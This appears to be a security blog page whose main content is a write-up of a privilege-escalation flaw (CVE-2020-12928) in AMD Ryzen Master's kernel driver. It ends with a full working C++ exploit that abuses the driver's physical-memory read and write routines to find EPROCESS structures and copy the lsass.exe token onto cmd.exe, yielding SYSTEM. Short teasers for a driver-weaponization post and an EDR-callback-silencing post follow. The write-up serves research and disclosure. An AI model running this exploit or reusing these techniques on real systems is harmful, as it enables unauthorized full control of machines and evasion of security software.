Basically, restriction 2 stops us adding a sub-domain SID for a capability, as capabilities use the package security authority (15), and we can't go straight to adding the SID-to-name mapping as we need to have registered the domain with the API first; it's not enough that the domain exists. Maybe there's some other easy way to do it, but this isn't it.

Instead I've just put together a .NET tool to add or remove your own SID to name mappings. It's up on github. The mappings are ephemeral so if you break something rebooting should fix it :-)


CVE-2020-12928 Exploit Proof-of-Concept, Privilege Escalation in AMD Ryzen Master AMDRyzenMasterDriver.sys

By: h0mbre
13 October 2020 at 04:00

Background

Earlier this year I was really focused on Windows exploit development and was working through the FuzzySecurity exploit development tutorials on the HackSysExtremeVulnerableDriver to try and learn and eventually went bug hunting on my own.

I ended up discovering what could be described as a logic bug in the ATI Technologies Inc. driver ‘atillk64.sys’. Being new to the Windows driver bug hunting space, I didn’t realize that this driver had already been analyzed and classified as vulnerable by Jesse Michael and his colleague Mickey in their ‘Screwed Drivers’ GitHub repo. It had also been mentioned in several other places that have been pointed out to me since.

So I didn’t really feel like I had discovered my first real bug and decided to hunt similar bugs on Windows 3rd party drivers until I found my own in the AMD Ryzen Master AMDRyzenMasterDriver.sys version 15.

I have since stopped looking for these types of bugs as I believe they wouldn’t really help me progress skills-wise, and my goals have changed since.

Thanks

Huge thanks to the following people for being so charitable, publishing things, messaging me back, encouraging me, and helping me along the way.

AMD Ryzen Master

The AMD Ryzen Master Utility is a tool for CPU overclocking. The software purportedly supports a growing list of processors and allows users fine-grained control over the performance settings of their CPU. You can read about it here.

AMD has published an advisory on their Product Security page for this vulnerability.

Vulnerability Analysis Overview

This vulnerability is extremely similar to my last Windows driver post, so please give that a once-over if this one lacks any depth and leaves you curious. I will try my best to limit the redundancy with the previous post.

All of my analysis was performed on Windows 10 Build 18362.19h1_release.190318-1202.

I picked this driver as a target because it is common for 3rd-party Windows drivers responsible for hardware configuration or diagnostics to expose powerful routines, ones that directly read from or write to physical memory, to low-privileged users.

Checking Permissions

The first thing I did after installing AMD Ryzen Master using the default installer was to locate the driver in OSR’s Device Tree utility and check its permissions. This is the first thing I was checking during this period because I had read that Microsoft did not consider a violation of the security boundary between Administrator and SYSTEM to be a serious violation. I wanted to ensure that my targets were all accessible from lower privileged users and groups.

Luckily for me, Device Tree indicated that the driver allowed all Authenticated Users to read and modify the driver.

Finding Interesting IOCTL Routines

Write What Where Routine

Next, I started looking at the driver in a free version of IDA. A search for MmMapIoSpace returned quite a few places in which the API was cross-referenced. I just began going down the list to see what code paths could reach these calls.

The first result, sub_140007278, looked very interesting to me.

We don’t know at this point if we control the API parameters in this routine, but looking at the routine statically you can see that we make our call to MmMapIoSpace, store the returned pointer value in [rsp+48h+BaseAddress], and do a check to make sure the return value was not NULL. If we have a valid pointer, we then progress into this loop routine on the bottom left.

At the start of the looping routine, we can see that eax gets the value of dword ptr [rsp+48h+NumberOfBytes] and then we compare eax to [rsp+48h+var_24]. This makes some sense because we already know from looking at the API call that [rsp+48h+NumberOfBytes] held the NumberOfBytes parameter for MmMapIoSpace. So essentially what this is looking like is, a check to see if a counter variable has reached our NumberOfBytes value. A quick highlight of eax shows that later it takes on the value of [rsp+48h+var_24], is incremented, and then eax is put back into [rsp+48h+var_24]. Then we’re back at the top of our loop where eax is set equal to NumberOfBytes before every check.

So this looked interesting to me: we can see that we’re doing something in a loop, byte by byte, until our NumberOfBytes value is reached. Once that value is reached, the other branch of our loop is a call to MmUnmapIoSpace.

Looking a bit closer at the loop, we can see a few interesting things. ecx is essentially a counter here as its set equal to our already mentioned counters eax and [rsp+48h+var_24]. We also see there is a mov to [rdx+rcx] from al. A single byte is written to the location of rdx + rcx. So we can make a guess that rdx is a base address and rcx is an offset. This is what a traditional for loop would seem to look like disassembled. al is taken from another similar construction in [r8+rax] where rax is now acting as the offset and r8 is a different base address.

So all in all, I decided this looks like a routine that is either doing a byte by byte read or a byte by byte write to kernel memory most likely. But if you look closely, you can see that the pointer returned from MmMapIoSpace is the one that al is written to (while tracking an offset) because it is eventually moved into rdx for the mov [rdx+rcx], al operation. This was exciting for me because if we can control the parameters of MmMapIoSpace, we will possibly be able to specify a physical memory address and offset and copy a user controlled buffer into that space once it is mapped into our process space. This is essentially a write what where primitive!

Looking at the first cross-reference to this routine, I started working my way back up the call graph until I was able to locate a probable IOCTL code.

After banging my head against my desk for hours trying to pass all of the checks to reach our glorious write what where routine, I was finally able to reach it and get a reliable BSOD. The checks were looking at the sizes of my input and output buffers supplied to my DeviceIoControl call. I was able to solve this by simply stringing together random length buffers of something like AAAAAAAABBBBBBBBCCCCCCCC etc, and seeing how the program would parse my input. Eventually I was able to figure out that the input buffer was structured as follows:

  • first 8 bytes of my input buffer would be the desired physical address you want mapped,
  • the next 4 bytes would represent the NumberOfBytes parameter,
  • and finally, and this is what took me the longest, the next 8 bytes were to be a pointer to the buffer you wanted to overwrite the mapped kernel memory with.

Very cool! We have control over all the MmMapIoSpace params except CacheType and we can specify what buffer to copy over!
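For reference, the full PoC at the end of this post builds that request by hand with memcpy calls; as a sketch, the same layout could be written as a struct (field names are mine, with the source bytes placed inline at offset 0xc the way the PoC does it):

#include <cstddef>
#include <cstdint>

#pragma pack(push, 1)
struct WriteWhatWhereInput {
    uint64_t physical_address; // physical address handed to MmMapIoSpace
    uint32_t number_of_bytes;  // MmMapIoSpace NumberOfBytes parameter
    uint8_t  payload[1];       // source bytes start here (offset 0xc);
                               // actual length is number_of_bytes
};
#pragma pack(pop)

static_assert(offsetof(WriteWhatWhereInput, payload) == 0xc,
              "payload must begin at offset 0xc");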

This is progress, I was fairly certain at this point I had a write primitive; however, I wasn’t exactly sure what to do with it. At this point, I reasoned that if a routine existed to do a byte by byte write to a kernel buffer somewhere, I probably also had the ability to do a byte by byte read of a kernel buffer. So I set out to find my routine’s sibling, the read what where routine (if she existed).

Read What Where

Now I went back to the other cross references of MmMapIoSpace calls and eventually came upon this routine, sub_1400063D0.

You’d be forgiven for thinking it looks just like the last routine we analyzed; I know I did and missed it initially. However, this routine differs in one major way: instead of copying byte by byte out of our process-space buffer and into a kernel buffer, we are copying byte by byte out of a kernel buffer and into our process-space buffer. I will spare you the technical analysis here but it is essentially our other routine with only the source and destination reversed! This is our read what where primitive, and I was able to backtrack a cross reference in IDA to this IOCTL.

There were a lot of rabbit holes here to go down but eventually this one ended up being straightforward once I found a clear cut code path to the routine from the IOCTL call graph.

Once again, we control the important MmMapIoSpace parameters and, in a difference from the other IOCTL, the byte-by-byte transfer occurs in our DeviceIoControl output buffer argument at an offset of 0xC bytes. So we can tell the driver to read physical memory from an arbitrary address, for an arbitrary length, and send us the results!

With these two powerful primitives, I tried to recreate my previous exploitation strategy employed in my last post.

Exploitation

Here I will try to walk through some code snippets and explain my thinking. Apologies for any programming mistakes in this PoC code; however, it works reliably on all the testing I performed (and it worked well enough for AMD to patch the driver.)

First, we’ll need to understand what I’m fishing for here. As I explained in my previous post, I tried to employ the same strategy that @b33f did with his driver exploit and fish for "Proc" tags in the kernel pool memory. Please refer to that post for any questions here. The TL;DR here is that information about processes is stored in the EPROCESS structure in the kernel and some of the important members for our purposes are:

  • ImageFileName (this is the name of the process)
  • UniqueProcessId (the PID)
  • Token (this is a security token value)

The offsets from the beginning of the structure to these members were as follows on my build:

  • 0x2e8 to the UniqueProcessId
  • 0x360 to the Token
  • 0x450 to the ImageFileName

You can see the offsets in WinDBG:

kd> !process 0 0 lsass.exe
PROCESS ffffd48ca64e7180
    SessionId: 0  Cid: 0260    Peb: 63d241d000  ParentCid: 01f0
    DirBase: 1c299b002  ObjectTable: ffffe60f220f2580  HandleCount: 1155.
    Image: lsass.exe

kd> dt nt!_EPROCESS ffffd48ca64e7180 UniqueProcessId Token ImageFilename
   +0x2e8 UniqueProcessId : 0x00000000`00000260 Void
   +0x360 Token           : _EX_FAST_REF
   +0x450 ImageFileName   : [15]  "lsass.exe"

Each data structure in the kernel pool has various headers (thanks to ReWolf for breaking this down so well):

  • POOL_HEADER structure (this is where our "Proc" tag will reside),
  • OBJECT_HEADER_xxx_INFO structures,
  • OBJECT_HEADER, which contains a Body where the EPROCESS structure lives.

As b33f explains in his write-up, all of the addresses where one begins looking for a "Proc" tag are 0x10-aligned, so every address here ends in a 0. We know that at some arbitrary address ending in 0, if we look at <address> + 0x4, that is where a "Proc" tag might be.

Leveraging Read What Where

The difficulty on my Windows build was that the length from my "Proc" tag, once found, to the beginning of the EPROCESS structure (where I know the offsets to the members I want) varied wildly. So much so that in order to get the exploit working reliably, I just simply had to create my own data structure and store instances of them in a vector. The data structure was as follows:

struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;
};

So as I’m using our Read What Where primitive to blow through all the RAM hunting for "Proc", if I find an instance of "Proc" I’ll iterate 0x10 bytes at a time until I find a marker signifying the end of our pool headers and the beginning of EPROCESS. This marker was 0x00B80003. So now, I’ll have the literal place where "Proc" was and store that in PROC_DATA.proc_address, I’ll also annotate how far that address was from the nearest page-aligned memory address (a multiple of 0x1000) in PROC_DATA.page_entry_offset, and also annotate how far from "Proc" it was until we reached our marker, the beginning of EPROCESS, in PROC_DATA.header_size. These will all be stored in a vector.

You can see this routine here:

INT64 results_begin = ((INT64)output_buff + 0xc);
        for (INT64 i = 0; i < 0xF60; i = i + 0x10) {

            PINT64 proc_ptr = (PINT64)(results_begin + 0x4 + i);
            INT32 proc_val = *(PINT32)proc_ptr;

            if (proc_val == 0x636f7250) {

                for (INT64 x = 0; x < 0xA0; x = x + 0x10) {

                    PINT64 header_ptr = PINT64(results_begin + i + x);
                    INT32 header_val = *(PINT32)header_ptr;

                    if (header_val == 0x00B80003) {

                        proc_count++;
                        cout << "\r[>] Proc chunks found: " << dec <<
                            proc_count << flush;

                        INT64 temp_addr = input_buff.start_address + i;

                        // This address might not be page-aligned to 0x1000
                        // so find out how far off from a multiple of 
                        // 0x1000 we are. This value is stored in our 
                        // PROC_DATA struct in the page_entry_offset
                        // member.
                        INT64 modulus = temp_addr % 0x1000;
                        proc_data.page_entry_offset.push_back(modulus);

                        // This is the page-aligned address where, either
                        // small or large paged memory will hold our "Proc"
                        // chunk. We store this as our proc_address member
                        // in PROC_DATA.
                        INT64 page_address = temp_addr - modulus;
                        proc_data.proc_address.push_back(
                            page_address);
                        proc_data.header_size.push_back(x);
                    }
                }
            }
        }

It will be more obvious with the entire exploit code, but what I’m doing here is basically starting from a physical address, and calling our read what where with a read size of 0x100c (0x1000 + 0xc as required so we can capture a whole page of memory and still keep our returned metadata information that starts at offset 0xc in our output buffer) in a loop, all the while adding these discovered PROC_DATA structures to a vector. Once we hit our max address or max iterations, we’ll send this vector over to a second routine that parses out all the data we care about, like the EPROCESS members.

It is important to note that I took great care to make sure that all calls to MmMapIoSpace used page-aligned physical addresses, as this is the most stable way to call the API.
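Putting that together, the outer scan loop looks roughly like this. This is a simplified sketch: input_buff, output_buff, hFile, bytes_ret, and the constants come from the fuller PoC below, and scan_page_for_procs is a placeholder name for the "Proc"-hunting inner loop shown above:

for (INT64 page = START_ADDRESS; page < STOP_ADDRESS; page += 0x1000) {

    // Always hand MmMapIoSpace a page-aligned physical address
    input_buff.start_address = page;

    if (!DeviceIoControl(
        hFile,
        READ_IOCTL,
        &input_buff,
        0x40,
        output_buff,
        0x100c,          // one full page + 0xc bytes of metadata
        &bytes_ret,
        NULL))
    {
        continue;        // couldn't read this page, move on
    }

    // Hunt the returned page for "Proc" chunks and record PROC_DATA
    // entries (the inner loop shown above)
    scan_page_for_procs(output_buff, page, proc_data);
}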

Now that I knew exactly how many "Proc" chunks I had found and stored all their relevant metadata in a vector, I could start a second routine that would use that metadata to check for their EPROCESS member values to see if they were processes I cared about.

My strategy here was to find the EPROCESS members for a privileged process such as lsass.exe and swap its security token with the security token of a cmd.exe process that I owned. You can see a portion of that code here:

INT64 results_begin = ((INT64)output_buff + 0xc);

        INT64 imagename_address = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x450; //ImageFileName
        INT64 imagename_value = *(PINT64)imagename_address;

        INT64 proc_token_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x360; //Token
        INT64 proc_token = *(PINT64)proc_token_addr;

        INT64 pid_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x2e8; //UniqueProcessId
        INT64 pid_value = *(PINT64)pid_addr;

        int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
            imagename_value);

        if (sys_result != 0) {

            system_token_count++;
            system_tokens.token_name.push_back(imagename_value);
            system_tokens.token_value.push_back(proc_token);
        }

        if (imagename_value == 0x6578652e646d63) {
            //cout << "[>] cmd.exe found!\n";
            cmd_token_address = (start_address + proc_data.header_size[i] +
                proc_data.page_entry_offset[i] + 0x360);
        }
    }

    if (system_tokens.token_name.size() != 0 and cmd_token_address != 0) {
        cout << "\n[>] cmd.exe and SYSTEM token information found!\n";
        cout << "[>] Let's swap tokens!\n";
    }
    else if (cmd_token_address == 0) {
        cout << "[!] No cmd.exe token address found, exiting...\n";
        exit(1);
    }

So now at this point I had the location and values of everything I cared about and it was time to leverage the Write What Where routine we had found.

Leveraging Write What Where

The problem I was facing was that I needed my calls to MmMapIoSpace to be page-aligned so that the calls remain stable and we don’t get any unnecessary BSODs.

So let’s picture a page of memory as a line.

<-----------------MEMORY PAGE----------------->

We can only write in page-sized chunks; however, the value we want to overwrite, the cmd.exe process's Token, is most likely not page-aligned. So now we have this:

<---------TOKEN------------------------------->

I could do a direct write at the exact address of this Token value, but my call to MmMapIoSpace would not be page-aligned.

So what I did was make one more Read What Where call to copy that page's contents, from the start of the page up to the Token, into a buffer, append the lsass.exe Token value where the cmd.exe Token sits, and then hand that buffer to the Write What Where routine.

So instead of an unaligned 8-byte write to simply overwrite the value, I'd be rewriting the page from its start through the Token while only actually changing those 8 bytes; that way, the calls to MmMapIoSpace stay page-aligned and clean.

You can see some of that math in the code snippet below with its references to modulus. Remember that the Write What Where routine used the input buffer of DeviceIoControl as the buffer it copied into kernel memory:

if (!DeviceIoControl(
        hFile,
        READ_IOCTL,
        &input_buff,
        0x40,
        output_buff,
        modulus + 0xc,
        &bytes_ret,
        NULL))
    {
        cout << "[!] Failed the read operation to copy the cmd.exe page...\n";
        cout << "[!] Last error: " << hex << GetLastError() << "\n";
        exit(1);
    }

    PBYTE results = (PBYTE)((INT64)output_buff + 0xc);

    PBYTE cmd_page_buff = (PBYTE)VirtualAlloc(
        NULL,
        modulus + 0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);
   

    DWORD num_of_bytes = modulus + 0x8;

    INT64 start_address = cmd_token_address;
    cout << "[>] cmd.exe token located at: " << hex << start_address << "\n";
    INT64 new_token_val = system_tokens.token_value[0];
    cout << "[>] Overwriting token with value: " << hex << new_token_val << "\n";

    memcpy(cmd_page_buff, results, modulus);
    memcpy(cmd_page_buff + modulus, (void*)&new_token_val, 0x8);

    // PhysicalAddress
    // NumberOfBytes
    // Buffer to be copied into system space
    BYTE input[0x1000] = { 0 };
    memcpy(input, (void*)&cmd_page, 0x8);
    memcpy(input + 0x8, (void*)&num_of_bytes, 0x4);
    memcpy(input + 0xc, cmd_page_buff, modulus + 0x8);

    if (DeviceIoControl(
        hFile,
        WRITE_IOCTL,
        input,
        modulus + 0x8 + 0xc,
        NULL,
        0,
        &bytes_ret,
        NULL))
    {
        cout << "[>] Write operation succeeded, you should be nt authority/system\n";
    }
    else {
        cout << "[!] Write operation failed, exiting...\n";
        exit(1);
    }

Final Results

You can see the mandatory full exploit screenshot below:

Disclosure Timeline

Big thanks to Tod Beardsley at Rapid7 for his help with the disclosure process!

  • 1 May 2020: Vendor notified of vulnerability
  • 1 May 2020: Vendor acknowledges vulnerability
  • 18 May 2020: Vendor supplies patch, restricting driver access to the Administrators group
  • 18 May 2020 - 11 July 2020: Back and forth about CVE assignment
  • 23 Aug 2020: CVE-2020-12927 assigned
  • 13 Oct 2020: Joint disclosure

Exploit Proof of Concept

#include <iostream>
#include <vector>
#include <algorithm>    // std::count
#include <chrono>
#include <ctime>        // time(), used to seed srand()
#include <cstdlib>      // srand()
#include <iomanip>
#include <Windows.h>
using namespace std;

#define DEVICE_NAME         "\\\\.\\AMDRyzenMasterDriverV15"
#define WRITE_IOCTL         (DWORD)0x81112F0C
#define READ_IOCTL          (DWORD)0x81112F08
#define START_ADDRESS       (INT64)0x100000000
#define STOP_ADDRESS        (INT64)0x240000000

// Creating vector of hex representations of ImageFileNames of common
// SYSTEM processes, e.g. 'wlms.exe' = hex('exe.smlw')
vector<INT64> SYSTEM_procs = {
    //0x78652e7373727363,         // csrss.exe
    0x78652e737361736c,         // lsass.exe
    //0x6578652e73736d73,         // smss.exe
    //0x7365636976726573,         // services.exe
    //0x6b6f72426d726753,         // SgrmBroker.exe
    //0x2e76736c6f6f7073,         // spoolsv.exe
    //0x6e6f676f6c6e6977,         // winlogon.exe
    //0x2e74696e696e6977,         // wininit.exe
    //0x6578652e736d6c77,         // wlms.exe
};

typedef struct {
    INT64 start_address;
    DWORD num_of_bytes;
    PBYTE write_buff;
} WRITE_INPUT_BUFFER;
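// Note: this struct documents the intended layout of a write request, but
// write() below packs its request into a raw byte buffer instead, since the
// bytes to be copied must sit inline after the 0xc-byte header rather than
// behind a pointer.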

typedef struct {
    INT64 start_address;
    DWORD num_of_bytes;
    char receiving_buff[0x1000];
} READ_INPUT_BUFFER;

// This struct will hold the address of a "Proc" tag's page entry, 
// that Proc chunk's header size, and how far into the page the "Proc" tag is
struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;
};

struct SYSTEM_TOKENS {
    std::vector<INT64> token_name;
    std::vector<INT64> token_value;
} system_tokens;

INT64 cmd_token_address = 0;

HANDLE grab_handle(const char* device_name) {

    HANDLE hFile = CreateFileA(
        device_name,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        0,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE)
    {
        cout << "[!] Unable to grab handle to " << DEVICE_NAME << "\n";
        exit(1);
    }
    else
    {
        cout << "[>] Grabbed handle 0x" << hex
            << (INT64)hFile << "\n";

        return hFile;
    }
}

PROC_DATA read_mem(HANDLE hFile) {

    cout << "[>] Reading through RAM for Proc tags...\n";
    DWORD num_of_bytes = 0x1000;

    LPVOID output_buff = VirtualAlloc(NULL,
        0x100c,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    PROC_DATA proc_data;

    int proc_count = 0;
    INT64 iteration = 0;
    while (true) {

        INT64 start_address = START_ADDRESS + (0x1000 * iteration);
        if (start_address >= STOP_ADDRESS) {
            cout << "\n[>] Max address reached.\n";
            cout << "[>] Number of iterations: " << dec << iteration << "\n";
            return proc_data;
        }

        READ_INPUT_BUFFER input_buff = { start_address, num_of_bytes };

        DWORD bytes_ret = 0;

        //cout << "[>] User buffer allocated at: 0x" << hex << output_buff << "\n";
        //Sleep(500);

        if (DeviceIoControl(
            hFile,
            READ_IOCTL,
            &input_buff,
            0x40,
            output_buff,
            0x100c,
            &bytes_ret,
            NULL))
        {
            //cout << "[>] DeviceIoControl succeeded!\n";
        }

        iteration++;

        //DebugBreak();
        INT64 results_begin = ((INT64)output_buff + 0xc);
        for (INT64 i = 0; i < 0xF60; i = i + 0x10) {

            PINT64 proc_ptr = (PINT64)(results_begin + 0x4 + i);
            INT32 proc_val = *(PINT32)proc_ptr;

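            // 0x636f7250 is "Proc" read as a little-endian DWORD, the
            // pool tag the kernel uses for process (EPROCESS) allocations.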
            if (proc_val == 0x636f7250) {

                for (INT64 x = 0; x < 0xA0; x = x + 0x10) {

                    PINT64 header_ptr = PINT64(results_begin + i + x);
                    INT32 header_val = *(PINT32)header_ptr;

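                    // 0x00B80003 is the pool-header DWORD observed in
                    // front of "Proc" chunks on the tested build; the
                    // value is version-specific.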
                    if (header_val == 0x00B80003) {

                        proc_count++;
                        cout << "\r[>] Proc chunks found: " << dec <<
                            proc_count << flush;

                        INT64 temp_addr = input_buff.start_address + i;

                        // This address might not be page-aligned to 0x1000
                        // so find out how far off from a multiple of 
                        // 0x1000 we are. This value is stored in our 
                        // PROC_DATA struct in the page_entry_offset
                        // member.
                        INT64 modulus = temp_addr % 0x1000;
                        proc_data.page_entry_offset.push_back(modulus);

                        // This is the page-aligned address where, either
                        // small or large paged memory will hold our "Proc"
                        // chunk. We store this as our proc_address member
                        // in PROC_DATA.
                        INT64 page_address = temp_addr - modulus;
                        proc_data.proc_address.push_back(
                            page_address);
                        proc_data.header_size.push_back(x);
                    }
                }
            }
        }
    }
}

void parse_procs(PROC_DATA proc_data, HANDLE hFile) {

    int system_token_count = 0;
    DWORD bytes_ret = 0;
    DWORD num_of_bytes = 0x1000;

    LPVOID output_buff = VirtualAlloc(
        NULL,
        0x100c,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    for (int i = 0; i < proc_data.header_size.size(); i++) {

        INT64 start_address = proc_data.proc_address[i];
        READ_INPUT_BUFFER input_buff = { start_address, num_of_bytes };

        if (DeviceIoControl(
            hFile,
            READ_IOCTL,
            &input_buff,
            0x40,
            output_buff,
            0x100c,
            &bytes_ret,
            NULL))
        {
            //cout << "[>] DeviceIoControl succeeded!\n";
        }

        INT64 results_begin = ((INT64)output_buff + 0xc);

        INT64 imagename_address = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x450; //ImageFileName
        INT64 imagename_value = *(PINT64)imagename_address;

        INT64 proc_token_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x360; //Token
        INT64 proc_token = *(PINT64)proc_token_addr;

        INT64 pid_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x2e8; //UniqueProcessId
        INT64 pid_value = *(PINT64)pid_addr;

        int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
            imagename_value);

        if (sys_result != 0) {

            system_token_count++;
            system_tokens.token_name.push_back(imagename_value);
            system_tokens.token_value.push_back(proc_token);
        }

        if (imagename_value == 0x6578652e646d63) {
            //cout << "[>] cmd.exe found!\n";
            cmd_token_address = (start_address + proc_data.header_size[i] +
                proc_data.page_entry_offset[i] + 0x360);
        }
    }

    if (system_tokens.token_name.size() != 0 && cmd_token_address != 0) {
        cout << "\n[>] cmd.exe and SYSTEM token information found!\n";
        cout << "[>] Let's swap tokens!\n";
    }
    else if (cmd_token_address == 0) {
        cout << "[!] No cmd.exe token address found, exiting...\n";
        exit(1);
    }
}

void write(HANDLE hFile) {

    DWORD modulus = cmd_token_address % 0x1000;
    INT64 cmd_page = cmd_token_address - modulus;
    DWORD bytes_ret = 0x0;
    DWORD read_num_bytes = modulus;

    PBYTE output_buff = (PBYTE)VirtualAlloc(
        NULL,
        modulus + 0xc,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    READ_INPUT_BUFFER input_buff = { cmd_page, read_num_bytes };

    if (!DeviceIoControl(
        hFile,
        READ_IOCTL,
        &input_buff,
        0x40,
        output_buff,
        modulus + 0xc,
        &bytes_ret,
        NULL))
    {
        cout << "[!] Failed the read operation to copy the cmd.exe page...\n";
        cout << "[!] Last error: " << hex << GetLastError() << "\n";
        exit(1);
    }

    PBYTE results = (PBYTE)((INT64)output_buff + 0xc);

    PBYTE cmd_page_buff = (PBYTE)VirtualAlloc(
        NULL,
        modulus + 0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);
   

    DWORD num_of_bytes = modulus + 0x8;

    INT64 start_address = cmd_token_address;
    cout << "[>] cmd.exe token located at: " << hex << start_address << "\n";
    INT64 new_token_val = system_tokens.token_value[0];
    cout << "[>] Overwriting token with value: " << hex << new_token_val << "\n";

    memcpy(cmd_page_buff, results, modulus);
    memcpy(cmd_page_buff + modulus, (void*)&new_token_val, 0x8);

    // PhysicalAddress
    // NumberOfBytes
    // Buffer to be copied into system space
    BYTE input[0x1000] = { 0 };
    memcpy(input, (void*)&cmd_page, 0x8);
    memcpy(input + 0x8, (void*)&num_of_bytes, 0x4);
    memcpy(input + 0xc, cmd_page_buff, modulus + 0x8);

    if (DeviceIoControl(
        hFile,
        WRITE_IOCTL,
        input,
        modulus + 0x8 + 0xc,
        NULL,
        0,
        &bytes_ret,
        NULL))
    {
        cout << "[>] Write operation succeeded, you should be nt authority/system\n";
    }
    else {
        cout << "[!] Write operation failed, exiting...\n";
        exit(1);
    }
}

int main()
{
    srand((unsigned)time(0));
    HANDLE hFile = grab_handle(DEVICE_NAME);

    PROC_DATA proc_data = read_mem(hFile);

    cout << "\n[>] Parsing procs...\n";
    parse_procs(proc_data, hFile);

    write(hFile);
}
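If the write succeeds, the cmd.exe whose token was overwritten is now running with the lsass.exe token; a quick check from that prompt confirms it (standard Windows tooling, output abridged):

C:\> whoami
nt authority\system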

Kernel exploitation: weaponizing CVE-2020-17382 MSI Ambient Link driver

24 September 2020 at 00:00
Preamble - Why are drivers still a valuable target? Kernels are, no euphemism intended, complex pieces of software, and the Windows OS is no exception. Long one of the toughest targets to scrutinize because of its closed source and undocumented APIs, it is now much better documented thanks to the immense effort of the research community. Regrettably, in recent times it has also grown in complexity, and its mitigations have improved considerably.

Silencing the EDR. How to disable process, threads and image-loading detection callbacks.

15 July 2020 at 00:00
Background - TL;DR This post picks up Rui's very inspiring piece on Windows kernel callbacks and takes it a little further by extending its functionality to build an all-purpose AV/EDR runtime detection bypass. Specifically, we are going to see how Kaspersky Total Security and Windows Defender use kernel callbacks to either prevent us from accessing LSASS's loaded modules or detect malicious activity. We'll then use our evil driver to temporarily silence any registered AV callbacks and restore the original code once we are done with our task.